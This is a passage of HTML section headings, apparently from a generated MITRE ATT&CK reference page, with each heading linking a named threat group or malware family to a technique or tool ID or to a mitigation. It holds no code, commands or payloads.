<h3 id="_chopstick_s0023_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_chopstick_s0023_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_chopstick_s0023_uses_standard_application_layer_protocol_t1071">CHOPSTICK (S0023) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_lurid_s0010_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_lurid_s0010_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_lurid_s0010_uses_custom_cryptographic_protocol_t1024">Lurid (S0010) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_process_discovery_t1057"><a class="anchor" href="#_helminth_s0170_uses_process_discovery_t1057"></a><a class="link" href="#_helminth_s0170_uses_process_discovery_t1057">Helminth (S0170) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_remote_file_copy_t1105"><a class="anchor" href="#_zlib_s0086_uses_remote_file_copy_t1105"></a><a class="link" href="#_zlib_s0086_uses_remote_file_copy_t1105">ZLib (S0086) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_s0143_uses_create_account_t1136"><a class="anchor" href="#_flame_s0143_uses_create_account_t1136"></a><a class="link" href="#_flame_s0143_uses_create_account_t1136">Flame (S0143) uses Create Account (T1136)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_plugx_s0013_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_plugx_s0013_uses_registry_run_keys_start_folder_t1060">PlugX (S0013) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_hammertoss_s0037_uses_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_hammertoss_s0037_uses_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_hammertoss_s0037_uses_exfiltration_over_alternative_protocol_t1048">HAMMERTOSS (S0037) uses Exfiltration Over Alternative Protocol (T1048)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_volgmer_s0180_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_volgmer_s0180_uses_uncommonly_used_port_t1065">Volgmer (S0180) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_command_line_interface_t1059"><a class="anchor" href="#_tinyzbot_s0004_uses_command_line_interface_t1059"></a><a class="link" href="#_tinyzbot_s0004_uses_command_line_interface_t1059">TinyZBot (S0004) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_sakula_s0074"><a class="anchor" href="#_deep_panda_g0009_uses_sakula_s0074"></a><a class="link" href="#_deep_panda_g0009_uses_sakula_s0074">Deep Panda (G0009) uses Sakula (S0074)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_file_deletion_t1107"><a class="anchor" href="#_bbsrat_s0127_uses_file_deletion_t1107"></a><a class="link" href="#_bbsrat_s0127_uses_file_deletion_t1107">BBSRAT (S0127) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_osinfo_s0165_uses_network_share_discovery_t1135"><a class="anchor" href="#_osinfo_s0165_uses_network_share_discovery_t1135"></a><a class="link" href="#_osinfo_s0165_uses_network_share_discovery_t1135">OSInfo (S0165) uses Network Share Discovery (T1135)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_rundll32_t1085"><a class="anchor" href="#_jhuhugit_s0044_uses_rundll32_t1085"></a><a class="link" href="#_jhuhugit_s0044_uses_rundll32_t1085">JHUHUGIT (S0044) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_code_signing_t1116"><a class="anchor" href="#_rtm_s0148_uses_code_signing_t1116"></a><a class="link" href="#_rtm_s0148_uses_code_signing_t1116">RTM (S0148) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_data_compressed_t1002"><a class="anchor" href="#_advstoreshell_s0045_uses_data_compressed_t1002"></a><a class="link" href="#_advstoreshell_s0045_uses_data_compressed_t1002">ADVSTORESHELL (S0045) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_file_deletion_t1107"><a class="anchor" href="#_blackenergy_s0089_uses_file_deletion_t1107"></a><a class="link" href="#_blackenergy_s0089_uses_file_deletion_t1107">BlackEnergy (S0089) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_credential_dumping_t1003"><a class="anchor" href="#_fin6_g0037_uses_credential_dumping_t1003"></a><a class="link" href="#_fin6_g0037_uses_credential_dumping_t1003">FIN6 (G0037) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_dustysky_s0062_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_dustysky_s0062_uses_windows_management_instrumentation_t1047">DustySky (S0062) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_remote_file_copy_t1105"><a class="anchor" href="#_kasidet_s0088_uses_remote_file_copy_t1105"></a><a class="link" href="#_kasidet_s0088_uses_remote_file_copy_t1105">Kasidet (S0088) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_pass_the_hash_t1075"><a class="anchor" href="#_cobalt_strike_s0154_uses_pass_the_hash_t1075"></a><a class="link" href="#_cobalt_strike_s0154_uses_pass_the_hash_t1075">Cobalt Strike (S0154) uses Pass the Hash (T1075)</a></h3>
</div>
<div class="sect2">
<h3 id="_lsass_driver_mitigation_t1177_mitigates_lsass_driver_t1177"><a class="anchor" href="#_lsass_driver_mitigation_t1177_mitigates_lsass_driver_t1177"></a><a class="link" href="#_lsass_driver_mitigation_t1177_mitigates_lsass_driver_t1177">LSASS Driver Mitigation (T1177) mitigates LSASS Driver (T1177)</a></h3>
</div>
<div class="sect2">
<h3 id="_bootkit_mitigation_t1067_mitigates_bootkit_t1067"><a class="anchor" href="#_bootkit_mitigation_t1067_mitigates_bootkit_t1067"></a><a class="link" href="#_bootkit_mitigation_t1067_mitigates_bootkit_t1067">Bootkit Mitigation (T1067) mitigates Bootkit (T1067)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_windows_admin_shares_t1077"><a class="anchor" href="#_shamoon_s0140_uses_windows_admin_shares_t1077"></a><a class="link" href="#_shamoon_s0140_uses_windows_admin_shares_t1077">Shamoon (S0140) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_remsec_s0125_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_remsec_s0125_uses_file_and_directory_discovery_t1083">Remsec (S0125) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt30_g0013_uses_shipshape_s0028"><a class="anchor" href="#_apt30_g0013_uses_shipshape_s0028"></a><a class="link" href="#_apt30_g0013_uses_shipshape_s0028">APT30 (G0013) uses SHIPSHAPE (S0028)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_volgmer_s0180_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_volgmer_s0180_uses_standard_cryptographic_protocol_t1032">Volgmer (S0180) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_create_account_t1136"><a class="anchor" href="#_dragonfly_g0035_uses_create_account_t1136"></a><a class="link" href="#_dragonfly_g0035_uses_create_account_t1136">Dragonfly (G0035) uses Create Account (T1136)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_remsec_s0125_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_remsec_s0125_uses_obfuscated_files_or_information_t1027">Remsec (S0125) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_komplex_s0162_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_komplex_s0162_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_komplex_s0162_uses_system_owner_user_discovery_t1033">Komplex (S0162) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_scripting_t1064"><a class="anchor" href="#_fin10_g0051_uses_scripting_t1064"></a><a class="link" href="#_fin10_g0051_uses_scripting_t1064">FIN10 (G0051) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_crimson_s0115_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_crimson_s0115_uses_file_and_directory_discovery_t1083">Crimson (S0115) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_prikormka_s0113_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_prikormka_s0113_uses_standard_cryptographic_protocol_t1032">Prikormka (S0113) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_masquerading_t1036"><a class="anchor" href="#_felismus_s0171_uses_masquerading_t1036"></a><a class="link" href="#_felismus_s0171_uses_masquerading_t1036">Felismus (S0171) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_timestomp_mitigation_t1099_mitigates_timestomp_t1099"><a class="anchor" href="#_timestomp_mitigation_t1099_mitigates_timestomp_t1099"></a><a class="link" href="#_timestomp_mitigation_t1099_mitigates_timestomp_t1099">Timestomp Mitigation (T1099) mitigates Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_blackenergy_s0089_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_blackenergy_s0089_uses_indicator_removal_on_host_t1070">BlackEnergy (S0089) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_system_service_discovery_t1007"><a class="anchor" href="#_oilrig_g0049_uses_system_service_discovery_t1007"></a><a class="link" href="#_oilrig_g0049_uses_system_service_discovery_t1007">OilRig (G0049) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_3para_rat_s0066_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_3para_rat_s0066_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_3para_rat_s0066_uses_standard_application_layer_protocol_t1071">3PARA RAT (S0066) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_gazer_s0168_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_gazer_s0168_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_gazer_s0168_uses_standard_application_layer_protocol_t1071">Gazer (S0168) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_system_information_discovery_t1082"><a class="anchor" href="#_powruner_s0184_uses_system_information_discovery_t1082"></a><a class="link" href="#_powruner_s0184_uses_system_information_discovery_t1082">POWRUNER (S0184) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_geminiduke_s0049_uses_system_service_discovery_t1007"><a class="anchor" href="#_geminiduke_s0049_uses_system_service_discovery_t1007"></a><a class="link" href="#_geminiduke_s0049_uses_system_service_discovery_t1007">GeminiDuke (S0049) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_ipconfig_s0100"><a class="anchor" href="#_apt1_g0006_uses_ipconfig_s0100"></a><a class="link" href="#_apt1_g0006_uses_ipconfig_s0100">APT1 (G0006) uses ipconfig (S0100)</a></h3>
</div>
<div class="sect2">
<h3 id="_chches_s0144_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_chches_s0144_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_chches_s0144_uses_custom_cryptographic_protocol_t1024">ChChes (S0144) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_cosmicduke_s0050_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_cosmicduke_s0050_uses_standard_application_layer_protocol_t1071">CosmicDuke (S0050) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_g0048_uses_web_service_t1102"><a class="anchor" href="#_rtm_g0048_uses_web_service_t1102"></a><a class="link" href="#_rtm_g0048_uses_web_service_t1102">RTM (G0048) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_domain_fronting_t1172"><a class="anchor" href="#_apt29_g0016_uses_domain_fronting_t1172"></a><a class="link" href="#_apt29_g0016_uses_domain_fronting_t1172">APT29 (G0016) uses Domain Fronting (T1172)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_psexec_s0029"><a class="anchor" href="#_apt34_g0057_uses_psexec_s0029"></a><a class="link" href="#_apt34_g0057_uses_psexec_s0029">APT34 (G0057) uses PsExec (S0029)</a></h3>
</div>
<div class="sect2">
<h3 id="_mshta_mitigation_t1170_mitigates_mshta_t1170"><a class="anchor" href="#_mshta_mitigation_t1170_mitigates_mshta_t1170"></a><a class="link" href="#_mshta_mitigation_t1170_mitigates_mshta_t1170">Mshta Mitigation (T1170) mitigates Mshta (T1170)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_powershell_t1086"><a class="anchor" href="#_cobalt_strike_s0154_uses_powershell_t1086"></a><a class="link" href="#_cobalt_strike_s0154_uses_powershell_t1086">Cobalt Strike (S0154) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_dll_search_order_hijacking_t1038"><a class="anchor" href="#_redleaves_s0153_uses_dll_search_order_hijacking_t1038"></a><a class="link" href="#_redleaves_s0153_uses_dll_search_order_hijacking_t1038">RedLeaves (S0153) uses DLL Search Order Hijacking (T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_snugride_s0159_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_snugride_s0159_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_snugride_s0159_uses_standard_application_layer_protocol_t1071">SNUGRIDE (S0159) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_3para_rat_s0066"><a class="anchor" href="#_putter_panda_g0024_uses_3para_rat_s0066"></a><a class="link" href="#_putter_panda_g0024_uses_3para_rat_s0066">Putter Panda (G0024) uses 3PARA RAT (S0066)</a></h3>
</div>
<div class="sect2">
<h3 id="_starloader_s0188_uses_masquerading_t1036"><a class="anchor" href="#_starloader_s0188_uses_masquerading_t1036"></a><a class="link" href="#_starloader_s0188_uses_masquerading_t1036">Starloader (S0188) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_lurid_s0010_uses_data_compressed_t1002"><a class="anchor" href="#_lurid_s0010_uses_data_compressed_t1002"></a><a class="link" href="#_lurid_s0010_uses_data_compressed_t1002">Lurid (S0010) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_cmd_s0106_uses_remote_file_copy_t1105"><a class="anchor" href="#_cmd_s0106_uses_remote_file_copy_t1105"></a><a class="link" href="#_cmd_s0106_uses_remote_file_copy_t1105">cmd (S0106) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_system_information_discovery_t1082"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_system_information_discovery_t1082"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_system_information_discovery_t1082">Backdoor.Oldrea (S0093) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_data_encoding_t1132"><a class="anchor" href="#_patchwork_g0040_uses_data_encoding_t1132"></a><a class="link" href="#_patchwork_g0040_uses_data_encoding_t1132">Patchwork (G0040) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_communication_through_removable_media_mitigation_t1092_mitigates_communication_through_removable_media_t1092"><a class="anchor" href="#_communication_through_removable_media_mitigation_t1092_mitigates_communication_through_removable_media_t1092"></a><a class="link" href="#_communication_through_removable_media_mitigation_t1092_mitigates_communication_through_removable_media_t1092">Communication Through Removable Media Mitigation (T1092) mitigates Communication Through Removable Media (T1092)</a></h3>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008_uses_masquerading_t1036"><a class="anchor" href="#_carbanak_g0008_uses_masquerading_t1036"></a><a class="link" href="#_carbanak_g0008_uses_masquerading_t1036">Carbanak (G0008) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_advstoreshell_s0045_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_advstoreshell_s0045_uses_registry_run_keys_start_folder_t1060">ADVSTORESHELL (S0045) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_group5_g0043_uses_screen_capture_t1113"><a class="anchor" href="#_group5_g0043_uses_screen_capture_t1113"></a><a class="link" href="#_group5_g0043_uses_screen_capture_t1113">Group5 (G0043) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpclient_s0068_uses_command_line_interface_t1059"><a class="anchor" href="#_httpclient_s0068_uses_command_line_interface_t1059"></a><a class="link" href="#_httpclient_s0068_uses_command_line_interface_t1059">httpclient (S0068) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_screen_capture_t1113"><a class="anchor" href="#_powruner_s0184_uses_screen_capture_t1113"></a><a class="link" href="#_powruner_s0184_uses_screen_capture_t1113">POWRUNER (S0184) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_at_s0110_uses_scheduled_task_t1053"><a class="anchor" href="#_at_s0110_uses_scheduled_task_t1053"></a><a class="link" href="#_at_s0110_uses_scheduled_task_t1053">at (S0110) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_apt28_g0007_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_apt28_g0007_uses_file_and_directory_discovery_t1083">APT28 (G0007) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_poshspy_s0150_uses_windows_management_instrumentation_event_subscription_t1084"><a class="anchor" href="#_poshspy_s0150_uses_windows_management_instrumentation_event_subscription_t1084"></a><a class="link" href="#_poshspy_s0150_uses_windows_management_instrumentation_event_subscription_t1084">POSHSPY (S0150) uses Windows Management Instrumentation Event Subscription (T1084)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_indicator_removal_from_tools_t1066"><a class="anchor" href="#_turla_g0010_uses_indicator_removal_from_tools_t1066"></a><a class="link" href="#_turla_g0010_uses_indicator_removal_from_tools_t1066">Turla (G0010) uses Indicator Removal from Tools (T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_input_capture_t1056"><a class="anchor" href="#_cosmicduke_s0050_uses_input_capture_t1056"></a><a class="link" href="#_cosmicduke_s0050_uses_input_capture_t1056">CosmicDuke (S0050) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_cmd_s0106"><a class="anchor" href="#_menupass_g0045_uses_cmd_s0106"></a><a class="link" href="#_menupass_g0045_uses_cmd_s0106">menuPass (G0045) uses cmd (S0106)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_remote_file_copy_t1105"><a class="anchor" href="#_apt3_g0022_uses_remote_file_copy_t1105"></a><a class="link" href="#_apt3_g0022_uses_remote_file_copy_t1105">APT3 (G0022) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_promethium_g0056_uses_truvasys_s0178"><a class="anchor" href="#_promethium_g0056_uses_truvasys_s0178"></a><a class="link" href="#_promethium_g0056_uses_truvasys_s0178">PROMETHIUM (G0056) uses Truvasys (S0178)</a></h3>
</div>
<div class="sect2">
<h3 id="_emissary_s0082_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_emissary_s0082_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_emissary_s0082_uses_system_network_configuration_discovery_t1016">Emissary (S0082) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_credential_dumping_t1003"><a class="anchor" href="#_mimikatz_s0002_uses_credential_dumping_t1003"></a><a class="link" href="#_mimikatz_s0002_uses_credential_dumping_t1003">Mimikatz (S0002) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_xtunnel_s0117_uses_network_service_scanning_t1046"><a class="anchor" href="#_xtunnel_s0117_uses_network_service_scanning_t1046"></a><a class="link" href="#_xtunnel_s0117_uses_network_service_scanning_t1046">XTunnel (S0117) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_karagany_s0094_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_trojan_karagany_s0094_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_trojan_karagany_s0094_uses_registry_run_keys_start_folder_t1060">Trojan.Karagany (S0094) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_nidiran_s0118_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_nidiran_s0118_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_nidiran_s0118_uses_standard_cryptographic_protocol_t1032">Nidiran (S0118) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonok_g0017_uses_poisonivy_s0012"><a class="anchor" href="#_dragonok_g0017_uses_poisonivy_s0012"></a><a class="link" href="#_dragonok_g0017_uses_poisonivy_s0012">DragonOK (G0017) uses PoisonIvy (S0012)</a></h3>
</div>
<div class="sect2">
<h3 id="_zlib_s0086_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_zlib_s0086_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_zlib_s0086_uses_file_and_directory_discovery_t1083">ZLib (S0086) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_downdelph_s0134_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_downdelph_s0134_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_downdelph_s0134_uses_bypass_user_account_control_t1088">Downdelph (S0134) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_file_deletion_t1107"><a class="anchor" href="#_advstoreshell_s0045_uses_file_deletion_t1107"></a><a class="link" href="#_advstoreshell_s0045_uses_file_deletion_t1107">ADVSTORESHELL (S0045) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_scripting_t1064"><a class="anchor" href="#_seaduke_s0053_uses_scripting_t1064"></a><a class="link" href="#_seaduke_s0053_uses_scripting_t1064">SeaDuke (S0053) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_disabling_security_tools_t1089"><a class="anchor" href="#_remsec_s0125_uses_disabling_security_tools_t1089"></a><a class="link" href="#_remsec_s0125_uses_disabling_security_tools_t1089">Remsec (S0125) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_callme_s0077_uses_command_line_interface_t1059"><a class="anchor" href="#_callme_s0077_uses_command_line_interface_t1059"></a><a class="link" href="#_callme_s0077_uses_command_line_interface_t1059">CallMe (S0077) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_ftp_s0095"><a class="anchor" href="#_oilrig_g0049_uses_ftp_s0095"></a><a class="link" href="#_oilrig_g0049_uses_ftp_s0095">OilRig (G0049) uses FTP (S0095)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_system_time_discovery_t1124"><a class="anchor" href="#_turla_g0010_uses_system_time_discovery_t1124"></a><a class="link" href="#_turla_g0010_uses_system_time_discovery_t1124">Turla (G0010) uses System Time Discovery (T1124)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_indicator_removal_from_tools_t1066"><a class="anchor" href="#_daserf_s0187_uses_indicator_removal_from_tools_t1066"></a><a class="link" href="#_daserf_s0187_uses_indicator_removal_from_tools_t1066">Daserf (S0187) uses Indicator Removal from Tools (T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_powershell_t1086"><a class="anchor" href="#_deep_panda_g0009_uses_powershell_t1086"></a><a class="link" href="#_deep_panda_g0009_uses_powershell_t1086">Deep Panda (G0009) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_gh0st_s0032_uses_process_discovery_t1057"><a class="anchor" href="#_gh0st_s0032_uses_process_discovery_t1057"></a><a class="link" href="#_gh0st_s0032_uses_process_discovery_t1057">gh0st (S0032) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_mimikatz_s0002"><a class="anchor" href="#_threat_group_3390_g0027_uses_mimikatz_s0002"></a><a class="link" href="#_threat_group_3390_g0027_uses_mimikatz_s0002">Threat Group-3390 (G0027) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_mis_type_s0084_uses_commonly_used_port_t1043"><a class="anchor" href="#_mis_type_s0084_uses_commonly_used_port_t1043"></a><a class="link" href="#_mis_type_s0084_uses_commonly_used_port_t1043">Mis-Type (S0084) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_command_line_interface_t1059"><a class="anchor" href="#_menupass_g0045_uses_command_line_interface_t1059"></a><a class="link" href="#_menupass_g0045_uses_command_line_interface_t1059">menuPass (G0045) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_exfiltration_over_physical_medium_t1052"><a class="anchor" href="#_remsec_s0125_uses_exfiltration_over_physical_medium_t1052"></a><a class="link" href="#_remsec_s0125_uses_exfiltration_over_physical_medium_t1052">Remsec (S0125) uses Exfiltration Over Physical Medium (T1052)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_credentials_in_files_t1081"><a class="anchor" href="#_apt28_g0007_uses_credentials_in_files_t1081"></a><a class="link" href="#_apt28_g0007_uses_credentials_in_files_t1081">APT28 (G0007) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_system_service_discovery_t1007"><a class="anchor" href="#_s_type_s0085_uses_system_service_discovery_t1007"></a><a class="link" href="#_s_type_s0085_uses_system_service_discovery_t1007">S-Type (S0085) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt29_g0016_uses_mimikatz_s0002"><a class="anchor" href="#_apt29_g0016_uses_mimikatz_s0002"></a><a class="link" href="#_apt29_g0016_uses_mimikatz_s0002">APT29 (G0016) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_sys10_s0060_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_sys10_s0060_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_sys10_s0060_uses_standard_application_layer_protocol_t1071">Sys10 (S0060) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_mimikatz_s0002"><a class="anchor" href="#_apt34_g0057_uses_mimikatz_s0002"></a><a class="link" href="#_apt34_g0057_uses_mimikatz_s0002">APT34 (G0057) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_system_information_discovery_t1082"><a class="anchor" href="#_kasidet_s0088_uses_system_information_discovery_t1082"></a><a class="link" href="#_kasidet_s0088_uses_system_information_discovery_t1082">Kasidet (S0088) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_oldbait_s0138"><a class="anchor" href="#_apt28_g0007_uses_oldbait_s0138"></a><a class="link" href="#_apt28_g0007_uses_oldbait_s0138">APT28 (G0007) uses OLDBAIT (S0138)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_system_information_discovery_t1082"><a class="anchor" href="#_s_type_s0085_uses_system_information_discovery_t1082"></a><a class="link" href="#_s_type_s0085_uses_system_information_discovery_t1082">S-Type (S0085) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_email_collection_t1114"><a class="anchor" href="#_apt1_g0006_uses_email_collection_t1114"></a><a class="link" href="#_apt1_g0006_uses_email_collection_t1114">APT1 (G0006) uses Email Collection (T1114)</a></h3>
</div>
<div class="sect2">
